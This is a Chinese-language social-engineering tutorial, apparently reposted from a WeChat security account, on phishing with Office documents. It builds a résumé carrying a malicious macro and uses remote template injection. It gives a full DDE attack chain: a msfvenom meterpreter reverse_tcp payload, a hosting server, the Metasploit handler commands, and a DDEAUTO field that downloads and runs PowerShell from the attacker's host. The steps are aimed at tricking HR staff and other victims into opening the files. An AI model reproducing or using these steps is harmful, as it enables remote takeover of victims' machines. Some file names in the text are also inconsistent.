社工钓鱼之Office钓鱼(中)

文章前言

本篇文章我们主要介绍Office在钓鱼中常见的应用与技巧

钓鱼实践

Office Macro

实验说明

Office宏，译自英文单词Macro，宏是微软公司为其OFFICE软件包设计的一个特殊功能，软件设计者为了让人们在使用软件进行工作时，避免一再地重复相同的动作而设计出来的一种工具，它利用简单的语法，把常用的动作写成宏，在工作时就可以直接利用事先编好的宏自动运行，去完成某项特定的任务，而不必再重复相同的动作，目的是让用户文档中的一些任务自动化，虽然Office宏会给我们的工作带来便利，但是也埋下了巨大的安全隐患。

在本小节中，我们的目的是构造一个存在恶意宏代码的简历文件并将其投放给HR，通过钓鱼控制目标主机

实验步骤

Step 1：首先准备一份简历

Step 2：使用CS生成恶意宏代码

Step 3：弹出界面选择Listener

Step 4：之后生成恶意宏代码

Step 5：之后在word简历中插入恶意宏代码，首先转到"视图->宏->查看宏'

之后新建宏名——shell

清空所有代码，然后将复制的代码粘贴到编辑器中

之后将其保存为启用宏的word文档，这里选择"否"

Step 6：之后将恶意简历发送给受害者用户

Step 7：当用户打开文档并启用宏时，可以成功得到shell

这里因为默认情况下，信任中的的宏设置为"禁用所有的宏，并发出通知"，所以需要用户主动点击启动宏：

如果你觉得.dotcm容易引起受害者的怀疑，那么你可以这样做：

Step 1：将具有恶意宏文件的dotm文件上传到服务器并开启监听

Step 2：修改下面的文件

Step 3：进入word文件夹中的_rels，找到settings.xml.rels文件

将其的target属性的值改为我们上面的那个URL，也就是http://22.124.56.238:8999/Doc1.dotm?raw=true

Step 4：接下来将刚才解压生成的文件压缩回去:

Step 5：将生成的压缩文件改名为后缀名为docx的文件

Step 5：将生成的恶意文件用邮箱钓鱼、qq或微信文件发送给受害者，当受害者双击打开文件时，恶意代码会被成功执行并上线

Office DDE

实验说明

OFFICE DDE是微软的OFFICE中的一个功能，能过够执行公式，插入远程图片，也可以用来执行恶意代码，本篇文章的目的是通过Office DDE漏洞实现钓鱼操作，并获取目标主机的权限，该漏洞主要影响以下Office应用：

• Office 365

• Microsoft Office 2000

• Microsoft Office 2003

• Microsoft Office 2007 Service Pack 3

• Microsoft Office 2010 Service Pack 2

• Microsoft Office 2013 Service Pack 1

• Microsoft Office 2016

简易测试

Step 1：准备一份简历，之后调用快捷键"CTRL+F9"填写域代码并保存

{DDEAUTO C:\windows\system32\cmd.exe "/k notepad.exe}

Step 2：之后重新打开

钓鱼实践

Step 1：使用msfvenom生成恶意载荷

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps2

Step 2：启动一个简易的web服务来托管shell.ps1

python2 -m SimpleHTTPServer 1234

Step 3：设置MSF监听

msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.174.129set lport 4444run

Step 4：在简历中插入恶意载

DDEAUTO C:\windows\system32\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.174.129:1234/shell.ps2') "

Step 5：将简历发送给受害者用户并诱导其打开

Step 6：之后成功返回一个Meterpreter

原文始发于微信公众号（七芒星实验室）：社工钓鱼之Office钓鱼(中)